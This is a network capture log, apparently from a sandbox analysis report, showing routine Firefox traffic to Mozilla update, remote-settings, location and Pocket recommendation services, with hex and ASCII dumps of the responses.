2024-07-26 18:10:49 UTC	459	OUT	GET /update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Windows_NT%252010.0.0.0.19045.2006%2520(x64)/ISET%3ASSE4_2%2CMEM%3A8191/default/default/update.xml HTTP/1.1 Host: aus5.mozilla.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
2024-07-26 18:10:49 UTC	454	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 18:10:49 GMT Content-Type: text/xml; charset=utf-8 Content-Length: 702 Vary: Accept-Encoding Rule-ID: 17933 Rule-Data-Version: 1 Strict-Transport-Security: max-age=31536000; X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none' X-Proxy-Cache-Status: MISS Via: 1.1 google Cache-Control: public,max-age=90 Alt-Svc: clear Connection: close
2024-07-26 18:10:49 UTC	702	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 0a 3c 75 70 64 61 74 65 73 3e 0a 20 20 20 20 3c 75 70 64 61 74 65 20 61 63 74 69 6f 6e 73 3d 22 73 68 6f 77 55 52 4c 22 20 61 70 70 56 65 72 73 69 6f 6e 3d 22 31 32 37 2e 30 22 20 62 75 69 6c 64 49 44 3d 22 32 30 32 34 30 36 30 36 31 38 31 39 34 34 22 20 64 65 74 61 69 6c 73 55 52 4c 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 65 6e 2d 55 53 2f 66 69 72 65 66 6f 78 2f 31 32 37 2e 30 2f 72 65 6c 65 61 73 65 6e 6f 74 65 73 2f 22 20 64 69 73 70 6c 61 79 56 65 72 73 69 6f 6e 3d 22 31 32 37 2e 30 22 20 6f 70 65 6e 55 52 4c 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 66 69 72 65 66 6f 78 2f 31 32 37 2e 30 2f 77 68 61 74 73 6e 65 77 Data Ascii: <?xml version="1.0"?><updates> <update actions="showURL" appVersion="127.0" buildID="20240606181944" detailsURL="https://www.mozilla.org/en-US/firefox/127.0/releasenotes/" displayVersion="127.0" openURL="https://www.mozilla.org/firefox/127.0/whatsnew

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	64151	34.160.144.191	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:49 UTC	440	OUT	GET /chains/remote-settings.content-signature.mozilla.org-2023-10-29-15-54-12.chain HTTP/1.1 Host: content-signature-2.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive If-Modified-Since: Sat, 09 Sep 2023 15:54:13 GMT If-None-Match: "defaf397a2137227b32599694fdb5208"
2024-07-26 18:10:49 UTC	189	IN	HTTP/1.1 304 Not Modified Date: Fri, 26 Jul 2024 18:04:10 GMT Age: 399 ETag: "defaf397a2137227b32599694fdb5208" Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	64154	35.190.72.216	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:50 UTC	338	OUT	GET /v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb HTTP/1.1 Host: location.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/json Connection: keep-alive
2024-07-26 18:10:50 UTC	324	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 18:10:50 GMT Content-Type: application/json Content-Length: 52 cache-control: max-age=0, no-cache, no-store, must-revalidate Strict-Transport-Security: max-age=31536000 Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-26 18:10:50 UTC	52	IN	Data Raw: 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 7d Data Ascii: {"country_code":"US","country_name":"United States"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	64155	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:50 UTC	323	OUT	GET /v1/buckets/monitor/collections/changes/changeset?_expected=0 HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:10:50 UTC	558	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 28983 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:38:57 GMT Last-Modified: Fri, 26 Jul 2024 16:24:32 GMT Content-Type: application/json Age: 1913 Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:10:50 UTC	832	IN	Data Raw: 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 75 63 6b 65 74 22 3a 22 6d 6f 6e 69 74 6f 72 22 7d 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 32 32 30 31 31 30 37 32 36 31 35 2c 22 63 68 61 6e 67 65 73 22 3a 5b 7b 22 69 64 22 3a 22 63 35 32 31 62 34 34 33 2d 33 36 38 66 2d 32 65 31 38 2d 61 38 35 33 2d 30 36 36 61 62 61 61 31 65 39 65 33 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 37 31 39 39 32 33 37 35 38 35 38 37 2c 22 62 75 63 6b 65 74 22 3a 22 62 6c 6f 63 6b 6c 69 73 74 73 22 2c 22 63 6f 6c 6c 65 63 74 69 6f 6e 22 3a 22 61 64 64 6f 6e 73 2d 62 6c 6f 6f 6d 66 69 6c 74 65 72 73 22 2c 22 68 6f 73 74 22 3a 22 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 22 7d 2c 7b 22 69 64 22 Data Ascii: {"metadata":{"bucket":"monitor"},"timestamp":1722011072615,"changes":[{"id":"c521b443-368f-2e18-a853-066abaa1e9e3","last_modified":1719923758587,"bucket":"blocklists","collection":"addons-bloomfilters","host":"firefox.settings.services.mozilla.com"},{"id"
2024-07-26 18:10:50 UTC	1390	IN	Data Raw: 22 62 6c 6f 63 6b 6c 69 73 74 73 22 2c 22 63 6f 6c 6c 65 63 74 69 6f 6e 22 3a 22 67 66 78 22 2c 22 68 6f 73 74 22 3a 22 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 22 7d 2c 7b 22 69 64 22 3a 22 30 65 35 34 33 35 35 36 2d 34 33 62 66 2d 33 31 33 39 2d 31 66 64 61 2d 32 61 30 30 36 38 31 31 36 63 36 64 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 37 31 37 37 30 35 32 30 33 31 37 36 2c 22 62 75 63 6b 65 74 22 3a 22 62 6c 6f 63 6b 6c 69 73 74 73 22 2c 22 63 6f 6c 6c 65 63 74 69 6f 6e 22 3a 22 63 65 72 74 69 66 69 63 61 74 65 73 22 2c 22 68 6f 73 74 22 3a 22 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 22 7d 2c 7b 22 Data Ascii: "blocklists","collection":"gfx","host":"firefox.settings.services.mozilla.com"},{"id":"0e543556-43bf-3139-1fda-2a0068116c6d","last_modified":1717705203176,"bucket":"blocklists","collection":"certificates","host":"firefox.settings.services.mozilla.com"},{"
2024-07-26 18:10:50 UTC	1390	IN	Data Raw: 6c 6c 65 63 74 69 6f 6e 22 3a 22 74 72 61 63 6b 69 6e 67 2d 70 72 6f 74 65 63 74 69 6f 6e 2d 6c 69 73 74 73 22 2c 22 68 6f 73 74 22 3a 22 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 22 7d 2c 7b 22 69 64 22 3a 22 38 64 61 37 64 62 31 65 2d 64 66 66 62 2d 31 38 63 39 2d 32 65 66 65 2d 30 65 39 64 37 34 35 39 61 30 66 34 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 37 32 31 39 35 32 36 30 33 31 31 38 2c 22 62 75 63 6b 65 74 22 3a 22 6d 61 69 6e 22 2c 22 63 6f 6c 6c 65 63 74 69 6f 6e 22 3a 22 6e 6f 72 6d 61 6e 64 79 2d 72 65 63 69 70 65 73 22 2c 22 68 6f 73 74 22 3a 22 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 22 Data Ascii: llection":"tracking-protection-lists","host":"firefox.settings.services.mozilla.com"},{"id":"8da7db1e-dffb-18c9-2efe-0e9d7459a0f4","last_modified":1721952603118,"bucket":"main","collection":"normandy-recipes","host":"firefox.settings.services.mozilla.com"
2024-07-26 18:10:50 UTC	1390	IN	Data Raw: 31 39 33 35 33 30 30 37 32 32 2c 22 62 75 63 6b 65 74 22 3a 22 6d 61 69 6e 22 2c 22 63 6f 6c 6c 65 63 74 69 6f 6e 22 3a 22 6e 69 6d 62 75 73 2d 64 65 73 6b 74 6f 70 2d 65 78 70 65 72 69 6d 65 6e 74 73 22 2c 22 68 6f 73 74 22 3a 22 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 22 7d 2c 7b 22 69 64 22 3a 22 61 33 63 30 63 62 37 64 2d 64 61 64 31 2d 61 35 39 36 2d 38 63 63 34 2d 38 63 65 61 65 63 34 32 38 65 34 62 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 37 32 31 38 38 34 38 30 35 34 36 38 2c 22 62 75 63 6b 65 74 22 3a 22 6d 61 69 6e 22 2c 22 63 6f 6c 6c 65 63 74 69 6f 6e 22 3a 22 64 65 76 74 6f 6f 6c 73 2d 63 6f 6d 70 61 74 69 62 69 6c 69 74 79 2d 62 72 6f 77 73 65 72 73 22 2c Data Ascii: 1935300722,"bucket":"main","collection":"nimbus-desktop-experiments","host":"firefox.settings.services.mozilla.com"},{"id":"a3c0cb7d-dad1-a596-8cc4-8ceaec428e4b","last_modified":1721884805468,"bucket":"main","collection":"devtools-compatibility-browsers",
2024-07-26 18:10:50 UTC	1390	IN	Data Raw: 38 30 30 37 2d 31 39 33 35 2d 61 65 61 38 2d 62 33 31 63 37 62 63 65 66 64 38 64 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 37 32 31 30 36 33 35 31 33 32 34 38 2c 22 62 75 63 6b 65 74 22 3a 22 6d 61 69 6e 22 2c 22 63 6f 6c 6c 65 63 74 69 6f 6e 22 3a 22 73 65 61 72 63 68 2d 64 65 66 61 75 6c 74 2d 6f 76 65 72 72 69 64 65 2d 61 6c 6c 6f 77 6c 69 73 74 22 2c 22 68 6f 73 74 22 3a 22 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 22 7d 2c 7b 22 69 64 22 3a 22 61 65 62 65 32 35 36 30 2d 61 32 31 34 2d 34 36 61 33 2d 65 31 38 66 2d 38 32 39 31 32 64 30 61 37 37 30 37 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 37 32 31 30 36 38 34 39 37 31 31 39 2c 22 62 75 63 6b 65 74 22 Data Ascii: 8007-1935-aea8-b31c7bcefd8d","last_modified":1721063513248,"bucket":"main","collection":"search-default-override-allowlist","host":"firefox.settings.services.mozilla.com"},{"id":"aebe2560-a214-46a3-e18f-82912d0a7707","last_modified":1721068497119,"bucket"
2024-07-26 18:10:50 UTC	1390	IN	Data Raw: 7d 2c 7b 22 69 64 22 3a 22 30 64 36 31 65 33 65 63 2d 63 37 30 38 2d 62 38 33 39 2d 35 31 32 61 2d 65 30 39 63 33 66 35 66 31 38 38 30 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 35 38 31 37 30 33 32 30 35 33 37 34 2c 22 62 75 63 6b 65 74 22 3a 22 6d 61 69 6e 22 2c 22 63 6f 6c 6c 65 63 74 69 6f 6e 22 3a 22 70 65 72 73 6f 6e 61 6c 69 74 79 2d 70 72 6f 76 69 64 65 72 2d 6d 6f 64 65 6c 73 22 2c 22 68 6f 73 74 22 3a 22 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 22 7d 2c 7b 22 69 64 22 3a 22 35 62 31 61 62 33 32 37 2d 35 31 39 36 2d 30 66 30 35 2d 36 32 39 66 2d 66 64 64 32 38 38 31 33 38 64 36 39 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 35 39 33 31 30 34 33 36 34 Data Ascii: },{"id":"0d61e3ec-c708-b839-512a-e09c3f5f1880","last_modified":1581703205374,"bucket":"main","collection":"personality-provider-models","host":"firefox.settings.services.mozilla.com"},{"id":"5b1ab327-5196-0f05-629f-fdd288138d69","last_modified":1593104364
2024-07-26 18:10:50 UTC	1390	IN	Data Raw: 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 22 7d 2c 7b 22 69 64 22 3a 22 36 66 63 64 33 37 39 62 2d 38 33 66 63 2d 31 31 31 63 2d 65 37 66 35 2d 63 39 66 61 39 64 37 63 61 66 32 35 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 36 30 37 30 34 32 31 34 33 35 39 30 2c 22 62 75 63 6b 65 74 22 3a 22 6d 61 69 6e 22 2c 22 63 6f 6c 6c 65 63 74 69 6f 6e 22 3a 22 70 69 6f 6e 65 65 72 2d 73 74 75 64 79 2d 61 64 64 6f 6e 73 2d 76 31 22 2c 22 68 6f 73 74 22 3a 22 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 22 7d 2c 7b 22 69 64 22 3a 22 61 39 39 38 65 35 65 30 2d 63 36 34 35 2d 32 35 65 34 2d 38 33 30 36 2d 64 32 32 39 35 33 62 61 61 63 62 34 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 Data Ascii: .mozilla.com"},{"id":"6fcd379b-83fc-111c-e7f5-c9fa9d7caf25","last_modified":1607042143590,"bucket":"main","collection":"pioneer-study-addons-v1","host":"firefox.settings.services.mozilla.com"},{"id":"a998e5e0-c645-25e4-8306-d22953baacb4","last_modified":1
2024-07-26 18:10:50 UTC	1390	IN	Data Raw: 2e 63 6f 6d 22 7d 2c 7b 22 69 64 22 3a 22 33 30 31 62 35 65 35 38 2d 65 65 63 39 2d 34 66 31 65 2d 32 66 39 37 2d 30 39 61 62 65 64 66 65 66 36 32 37 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 36 34 37 30 32 30 36 30 30 33 35 39 2c 22 62 75 63 6b 65 74 22 3a 22 6d 61 69 6e 22 2c 22 63 6f 6c 6c 65 63 74 69 6f 6e 22 3a 22 74 6f 70 2d 73 69 74 65 73 22 2c 22 68 6f 73 74 22 3a 22 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 22 7d 2c 7b 22 69 64 22 3a 22 61 32 35 32 64 64 34 38 2d 31 32 35 32 2d 37 31 34 39 2d 31 63 33 66 2d 31 65 38 32 36 39 37 38 34 33 61 66 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 36 34 37 35 34 39 37 32 32 31 30 37 2c 22 62 75 63 6b 65 74 22 3a Data Ascii: .com"},{"id":"301b5e58-eec9-4f1e-2f97-09abedfef627","last_modified":1647020600359,"bucket":"main","collection":"top-sites","host":"firefox.settings.services.mozilla.com"},{"id":"a252dd48-1252-7149-1c3f-1e82697843af","last_modified":1647549722107,"bucket":
2024-07-26 18:10:50 UTC	1390	IN	Data Raw: 22 69 64 22 3a 22 37 31 65 34 36 38 64 30 2d 38 30 30 36 2d 61 38 33 31 2d 38 37 33 65 2d 36 34 64 35 31 38 63 64 38 35 31 35 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 36 37 34 35 39 35 30 34 38 37 32 36 2c 22 62 75 63 6b 65 74 22 3a 22 6d 61 69 6e 22 2c 22 63 6f 6c 6c 65 63 74 69 6f 6e 22 3a 22 70 61 73 73 77 6f 72 64 2d 72 65 63 69 70 65 73 22 2c 22 68 6f 73 74 22 3a 22 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 22 7d 2c 7b 22 69 64 22 3a 22 32 63 32 62 63 62 33 35 2d 62 35 66 37 2d 65 30 31 35 2d 62 35 34 66 2d 33 64 36 30 66 65 63 63 66 32 36 64 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 36 37 39 36 30 30 30 33 32 37 34 32 2c 22 62 75 63 6b 65 74 22 3a 22 Data Ascii: "id":"71e468d0-8006-a831-873e-64d518cd8515","last_modified":1674595048726,"bucket":"main","collection":"password-recipes","host":"firefox.settings.services.mozilla.com"},{"id":"2c2bcb35-b5f7-e015-b54f-3d60feccf26d","last_modified":1679600032742,"bucket":"
2024-07-26 18:10:50 UTC	1390	IN	Data Raw: 22 3a 22 30 62 36 39 36 63 33 37 2d 65 34 34 32 2d 62 39 32 66 2d 36 35 65 65 2d 61 30 31 32 33 32 32 33 66 32 32 34 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 37 30 34 39 31 30 31 33 37 31 36 32 2c 22 62 75 63 6b 65 74 22 3a 22 6d 61 69 6e 22 2c 22 63 6f 6c 6c 65 63 74 69 6f 6e 22 3a 22 6d 73 2d 69 6d 61 67 65 73 22 2c 22 68 6f 73 74 22 3a 22 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 22 7d 2c 7b 22 69 64 22 3a 22 32 38 66 30 65 37 66 64 2d 37 61 66 37 2d 36 31 37 66 2d 65 62 61 33 2d 62 61 38 30 65 35 66 37 31 34 38 66 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 37 30 35 37 30 31 30 39 39 36 30 33 2c 22 62 75 63 6b 65 74 22 3a 22 6d 61 69 6e 22 2c 22 63 6f 6c Data Ascii: ":"0b696c37-e442-b92f-65ee-a0123223f224","last_modified":1704910137162,"bucket":"main","collection":"ms-images","host":"firefox.settings.services.mozilla.com"},{"id":"28f0e7fd-7af7-617f-eba3-ba80e5f7148f","last_modified":1705701099603,"bucket":"main","col

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	64162	34.120.5.221	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:51 UTC	364	OUT	GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=US&count=30 HTTP/1.1 Host: getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:10:51 UTC	336	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 21449 X-Powered-By: Express Via: 1.1 google Date: Fri, 26 Jul 2024 15:55:49 GMT Age: 8102 ETag: W/"53c9-aSb7+1MtPmXowLOS3U+Gxyaiq5E" Content-Type: application/json; charset=utf-8 Vary: Accept-Encoding Cache-Control: public,max-age=900,public Alt-Svc: clear Connection: close
2024-07-26 18:10:51 UTC	1054	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 31 2c 22 73 70 6f 63 73 22 3a 5b 5d 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 64 6f 6d 61 69 6e 41 66 66 69 6e 69 74 79 50 61 72 61 6d 65 74 65 72 53 65 74 73 22 3a 7b 7d 2c 22 74 69 6d 65 53 65 67 6d 65 6e 74 73 22 3a 5b 7b 22 69 64 22 3a 22 77 65 65 6b 22 2c 22 73 74 61 72 74 54 69 6d 65 22 3a 36 30 34 38 30 30 2c 22 65 6e 64 54 69 6d 65 22 3a 30 2c 22 77 65 69 67 68 74 50 6f 73 69 74 69 6f 6e 22 3a 31 7d 2c 7b 22 69 64 22 3a 22 6d 6f 6e 74 68 22 2c 22 73 74 61 72 74 54 69 6d 65 22 3a 32 35 39 32 30 30 30 2c 22 65 6e 64 54 69 6d 65 22 3a 36 30 34 38 30 30 2c 22 77 65 69 67 68 74 50 6f 73 69 74 69 6f 6e 22 3a 30 2e 35 7d 5d 2c 22 72 65 63 73 45 78 70 69 72 65 54 69 6d 65 22 3a 35 34 30 30 2c 22 73 70 6f 63 73 50 65 72 4e 65 Data Ascii: {"status":1,"spocs":[],"settings":{"domainAffinityParameterSets":{},"timeSegments":[{"id":"week","startTime":604800,"endTime":0,"weightPosition":1},{"id":"month","startTime":2592000,"endTime":604800,"weightPosition":0.5}],"recsExpireTime":5400,"spocsPerNe
2024-07-26 18:10:51 UTC	1390	IN	Data Raw: 22 3a 34 35 38 34 31 37 35 34 34 35 35 32 37 35 38 31 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 67 65 74 70 6f 63 6b 65 74 2e 63 6f 6d 2f 65 78 70 6c 6f 72 65 2f 69 74 65 6d 2f 32 35 2d 79 65 61 72 73 2d 6c 61 74 65 72 2d 74 68 69 73 2d 63 6f 7a 79 2d 6e 36 34 2d 63 6c 61 73 73 69 63 2d 66 69 6e 61 6c 6c 79 2d 67 65 74 73 2d 74 68 65 2d 72 65 63 6f 67 6e 69 74 69 6f 6e 2d 69 74 2d 64 65 73 65 72 76 65 73 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 70 6f 63 6b 65 74 2d 6e 65 77 74 61 62 2d 65 6e 2d 75 73 22 2c 22 74 69 74 6c 65 22 3a 22 54 68 69 73 20 43 6f 7a 79 20 4e 36 34 20 43 6c 61 73 73 69 63 20 48 61 73 20 46 69 6e 61 6c 6c 79 20 47 6f 74 74 65 6e 20 54 68 65 20 52 65 63 6f 67 6e 69 74 69 6f 6e 20 49 74 20 44 65 73 65 72 76 65 73 22 2c 22 65 78 63 65 Data Ascii: ":4584175445527581,"url":"https://getpocket.com/explore/item/25-years-later-this-cozy-n64-classic-finally-gets-the-recognition-it-deserves?utm_source=pocket-newtab-en-us","title":"This Cozy N64 Classic Has Finally Gotten The Recognition It Deserves","exce
2024-07-26 18:10:51 UTC	1390	IN	Data Raw: 69 64 65 72 2e 63 6f 6d 2f 6f 70 65 6e 61 69 2d 73 65 61 72 63 68 67 70 74 2d 73 65 61 72 63 68 2d 65 6e 67 69 6e 65 2d 70 72 6f 74 6f 74 79 70 65 2d 64 65 63 6c 61 72 65 73 2d 77 61 72 2d 77 69 74 68 2d 67 6f 6f 67 6c 65 2d 32 30 32 34 2d 35 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 70 6f 63 6b 65 74 2d 6e 65 77 74 61 62 2d 65 6e 2d 75 73 22 2c 22 74 69 74 6c 65 22 3a 22 4f 70 65 6e 41 49 e2 80 99 73 20 4e 65 77 20 53 65 61 72 63 68 47 50 54 20 50 72 6f 74 6f 74 79 70 65 20 49 73 20 61 20 44 65 63 6c 61 72 61 74 69 6f 6e 20 6f 66 20 57 61 72 20 41 67 61 69 6e 73 74 20 47 6f 6f 67 6c 65 22 2c 22 65 78 63 65 72 70 74 22 3a 22 49 74 e2 80 99 73 20 6f 66 66 69 63 69 61 6c 20 e2 80 94 20 4f 70 65 6e 41 49 20 69 73 20 63 6f 6d 69 6e 67 20 66 6f 72 20 47 6f 6f 67 6c Data Ascii: ider.com/openai-searchgpt-search-engine-prototype-declares-war-with-google-2024-5?utm_source=pocket-newtab-en-us","title":"OpenAIs New SearchGPT Prototype Is a Declaration of War Against Google","excerpt":"Its official OpenAI is coming for Googl
2024-07-26 18:10:51 UTC	1390	IN	Data Raw: 32 46 32 34 25 32 46 64 35 37 63 64 62 38 62 25 32 46 71 75 69 74 63 6f 6f 6b 69 6e 67 5f 73 6f 63 69 61 6c 2e 6a 70 67 25 33 46 77 25 33 44 31 32 30 30 25 32 36 68 25 33 44 36 33 30 25 32 36 66 69 74 25 33 44 63 72 6f 70 25 32 36 63 72 6f 70 25 33 44 66 61 63 65 73 25 32 36 66 6d 25 33 44 6a 70 67 26 72 65 73 69 7a 65 3d 77 34 35 30 22 7d 2c 7b 22 69 64 22 3a 34 34 32 32 37 33 33 39 36 38 37 31 32 33 39 35 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 67 65 74 70 6f 63 6b 65 74 2e 63 6f 6d 2f 65 78 70 6c 6f 72 65 2f 69 74 65 6d 2f 74 68 65 2d 62 65 67 69 6e 6e 65 72 2d 73 2d 67 75 69 64 65 2d 74 6f 2d 63 61 74 63 68 69 6e 67 2d 79 6f 75 72 2d 66 69 72 73 74 2d 66 69 73 68 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 70 6f 63 6b 65 74 2d 6e 65 77 74 61 62 2d 65 Data Ascii: 2F24%2Fd57cdb8b%2Fquitcooking_social.jpg%3Fw%3D1200%26h%3D630%26fit%3Dcrop%26crop%3Dfaces%26fm%3Djpg&resize=w450"},{"id":4422733968712395,"url":"https://getpocket.com/explore/item/the-beginner-s-guide-to-catching-your-first-fish?utm_source=pocket-newtab-e
2024-07-26 18:10:51 UTC	1390	IN	Data Raw: 32 46 73 33 2e 75 73 2d 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 70 6f 63 6b 65 74 2d 63 75 72 61 74 65 64 63 6f 72 70 75 73 61 70 69 2d 70 72 6f 64 2d 69 6d 61 67 65 73 25 32 46 61 62 33 66 34 30 37 35 2d 34 64 34 61 2d 34 34 39 61 2d 62 63 36 63 2d 66 37 38 66 63 37 62 36 39 64 61 30 2e 6a 70 65 67 26 72 65 73 69 7a 65 3d 77 34 35 30 22 7d 2c 7b 22 69 64 22 3a 31 32 33 33 35 34 38 36 36 31 37 33 36 34 37 35 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 67 65 74 70 6f 63 6b 65 74 2e 63 6f 6d 2f 65 78 70 6c 6f 72 65 2f 69 74 65 6d 2f 74 68 65 2d 6d 69 6c 6c 69 6f 6e 2d 64 6f 6c 6c 61 72 2d 73 63 61 6d 6d 65 72 2d 61 6e 64 2d 68 69 73 2d 6d 61 6e 79 2d 6d 6f 72 6d 6f 6e 2d 6d 61 72 6b 73 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 70 Data Ascii: 2Fs3.us-east-1.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fab3f4075-4d4a-449a-bc6c-f78fc7b69da0.jpeg&resize=w450"},{"id":1233548661736475,"url":"https://getpocket.com/explore/item/the-million-dollar-scammer-and-his-many-mormon-marks?utm_source=p
